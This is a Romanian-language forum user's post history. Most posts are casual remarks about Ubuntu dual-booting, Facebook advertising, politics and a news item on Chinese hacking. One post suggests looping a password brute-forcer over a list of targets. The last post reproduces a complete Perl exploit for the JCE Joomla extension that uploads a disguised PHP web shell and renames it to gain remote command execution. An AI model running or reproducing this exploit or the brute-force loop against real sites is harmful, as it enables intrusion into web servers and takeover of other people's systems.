-
Posts
1494 -
Joined
-
Last visited
-
Days Won
15
Everything posted by hades
-
"1) Tex avea serverele acasa la ala caruia i-au spart usa (virusica) si automat a fost bagat in aceiasi oala cu el ." Ce? Omu avea Datacenter. Acasa la virus nu era Datacenter. Frate, nu lansati speculatii d-astea ca vreun jurnalist de mahala citeste si ia de bun.
-
Dar era vorba ca trebuie sa vina Mos Craciun...
-
Sa-nteleg ca tu ai proiectorul si calculatorul pe extended desktop? Daca da, uita-te atend in setari si alege una din celelalte; Nu mai stiu exact care-s variantele dar una din ele iti afiseaza pe proiector doar poze/video-uri etc. Sau, poti folosi Arkaos Grand VJ
-
Toate incercarile nefaste de a face politica pe internet sfarsesc prin a deveni o dejectie publica a unor minti atrofiate de comunism, ipocrizie si prostie.
-
Sa spargi site-uri? Nu se poate asa ceva. Trebuie invatat modul de functionare a mecanismului din spatele paginilor web, pentru ca acolo trebuie tu sa lucrezi, iar pentru a face asta cel mai usor e sa inveti sa creezi ceva pentru a-i afla vulnerabilitatile. Nu te lasa influentat de prostime; Sunt multe moduri de atac asupra unui site web care nu se rezuma la 'sql injection'.
-
Salut. Programul e numeste co4ilii. E cu licenta. S-ar putea sa il gasesti la tex. Da-i un PM si incearca-ti norocul.
-
1. Designul prost 2. Reclamele nu se pupa de nici o culoare cu designul 3. Bannerele par picate din cer Nu poti sa te astepti ca lumea sa se uite la content pentru inceput. Designul e primul lucru care loveste la ochi. Daca nu-mi place ce vad, nu mai stau sa citesc, iar tu poti sa scri acolo cate-n luna si soare. Sari prea repede la advertoriale. Nu iti permiti sa scri despre un produs fara sa-l fi incercat. Nu poti emite o parere pertinenta despre asa ceva.
-
Poate e vorba de encoding; Dracu-ti downloadeaza/deschide fisierul.
-
Voi visati sa va imbogatiti cu 0.5$ pe zi?
-
China is increasingly using hackers to infiltrate U.S. military computers and defense contractors, according to a draft of Congressional report obtained by Bloomberg. The report, produced by the U.S.- China Economic and Security Review Commission, found that China's persistence and its advances in hacking activities over the past year poses an increasing threat to information systems and users. The risks include attempts to blind or disrupt U.S. intelligence and communications satellites, weapons targeting systems, and navigation computers, Bloomberg reported, citing an anonymous U.S. intelligence official. While the attacks are considered basic techniques, the volume of the activity has allowed China to become a threat, according to the report, adding that the intrusions are largely designed to collect information instead of attacking systems. The report, scheduled for release on Nov. 14, called for Congress to develop ways to punish and penalize companies found to have engaged in industrial espionage. Word of the commission's report comes a month after the U.S. House Intelligence Committee released its own report advising companies to veer away from using Chinese telecommunications manufacturers Huawei and ZTE. The committee expressed continuing concerns about the Chinese government's role in the two companies, but didn't offer specifics. Both Huawei and ZTE deny any influence by the Chinese government and rebut claims that they pose a security threat. Probabil ca lumea iubeste la nebunie proxyurile de China pentru treburile dubioase; Si uite asa paranoicii din America cred ca vin Chinezii peste ei. Sursa
-
Voi mancati cacat cu 2 linguri? Va atingeti de fiecare data cand vplay merge sau nu merge si traiti intr-o lume in care CNA-ul se baga peste legile internetului. Vplay a lucrat la servere zilele trecute; Le-o fi muls de-amiaza si d-aia acum sunt figuri la video-uri. Vedeti ca intra mascatii peste toti cei care au conturi pe vplay.
-
Ma uit in seara asta si incerc sa-l modific asa cum spuneai; Sa ia ip-urile dintr-o lista sugerata de tine.
-
Ar merge scos doar bruterul din script si in rest in bash scris frumos: for each $line in tinte.txt do python brute.py $line userlist wordlist .
-
Threadul acesta e o prostie/mizerie. Pedeapsa capitala, sau pedeapsa cu moartea, nu inseamna decapitare; La fel cum dreptatea nu inseamna moarte si la fel cum justitia nu inseamna dreptate. Pedeapsa cu moartea se poate rezuma la seringa letala; Fara sange si scene 'horror'. As opta pentru carcera pe viata pentru infractori decat pedeapsa capitala. Cancan-uri.
-
Bun, tu vrei doar Ubuntu, ca asa sunt h4x0rii. Atunci, scapi dracu de C. Faci un live usb cu ubuntu, bootezi de pe el, install ubuntu si in loc sa alegi Install Ubuntu in Dual Boot with Windows mergi pe alta optiune. Editezi partitiile: 1) Stergi C-ul 2) Micsorezi D-ul 3) Faci 3 partitii cum ti-am spus. Boot loader-ul il lasi unde e. Ce ti-a ramas din D e in format NTFS, adica, o sa poti accesa D-ul dupa ce ti-ai bagat Ubuntu-ul.
-
NU! Ai nevoie de paritii EXT. Una pentru /home una pentru /root si optional un /swap
-
Daca-l iei pentru 'hacking' las-o asa. NTFS-urile le citeste el AUTOMAT.
-
Ubuntu citeste NTFS-urile; Le poti accesa. League Of Legends-ul merge emulat cu Wine-ul. Totusi, in Dual Boot se comporta foarte bine.
-
1) Poti instala Ubuntu in Dual Boot cu Windowsul. Iti vede partitiile NTFS. 2) Poti emula unele jocuri cu Wine; Nu toate. 3) Paritiile NTFS dupa cum spuneam sunt recunoscute de Ubuntu, dar invers nu.
-
http://www.youtube.com/watch?v=ZDvszfLOOpQ 12 minute extraordinare. Am ras cu lacrimi.
-
I-auzi; Depinde ce vrei sa-ti promovezi. Daca vrei sa-ti promovezi pagina de facebook a firmei/site-ului, cea mai buna care sunt facebook ads; Like-uri de calitate, nu prostii. Like-uri la pagina de facebook se pot materializa in trafic pe site.
-
Asa, si? Facebook introduce reclame cam peste tot; Din sponsored posts in timeline, la sponsored like si reclame langa/sub poze. Datacenterul ala nu se intretine singur.
-
Evident. Ai router si pentru a putea folosi payload-ul respectiv trebuie sa iti faci port forwarding.
-
use IO::Socket; use LWP::Simple; system("cls"); if(!defined($ARGV[0])) { print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n"; print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n"; print "\t+--> Usage: perl $0 <host> <--+\n"; print "\t+--> Example: perl $0 localhost <--+\n\n"; exit; } print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n"; print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n"; $TARGET = $ARGV[0]; $PORT = "80"; $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"; $SHELL = "/images/stories/0day.php?cmd="; $HTTP = "http://"; $header1G = "GET $SCRIPT HTTP/1.1"; $header1H = "HEAD /images/stories/0day.php HTTP/1.1"; $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 769"; $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = "<? system($_REQUEST['cmd']);exit; ?>"; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = '0day'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}'; $header24 = "Content-Length: ".length($header25).""; ############################################### Packet 1 --> Checking Exploitability ######################################################### print "\n[*] Checking Exploitability ...\n\n"; sleep 2; $pageURL=$TARGET.$SCRIPT; $simplePage=get($pageURL); @arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title"); while (($count!=10) && ($die != 1)) { foreach $arr(@arr){ if ($simplePage =~ m/$arr/) { print "\n[*] Target patched.\n\n"; $die = 1; } else { $count++; } } } if ($count==5) {print "[*] Target is exploitable.\n\n"}; ############################################### Packet 2 --> Uploading shell as a gif file ######################################################### $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print "[*] Trying to upload 0day.gif ...\n\n"; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep 2; ############################################### Packet 3 --> Change Extension from .gif to .php ######################################################### print "[*] Trying to change extension from .gif to .php ...\n\n"; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; ############################################### Packet 4 --> Check for successfully uploaded ######################################################### $shellurl=$TARGET.$SHELL; $output=get($shellurl); while ($output = <$remote> ) { if ($output =~ /200 OK/) { print "[+] 0day.php was successfully uploaded\n\n"; print "[+] Path:".$TARGET.$SHELL."id\n"; }} Sursa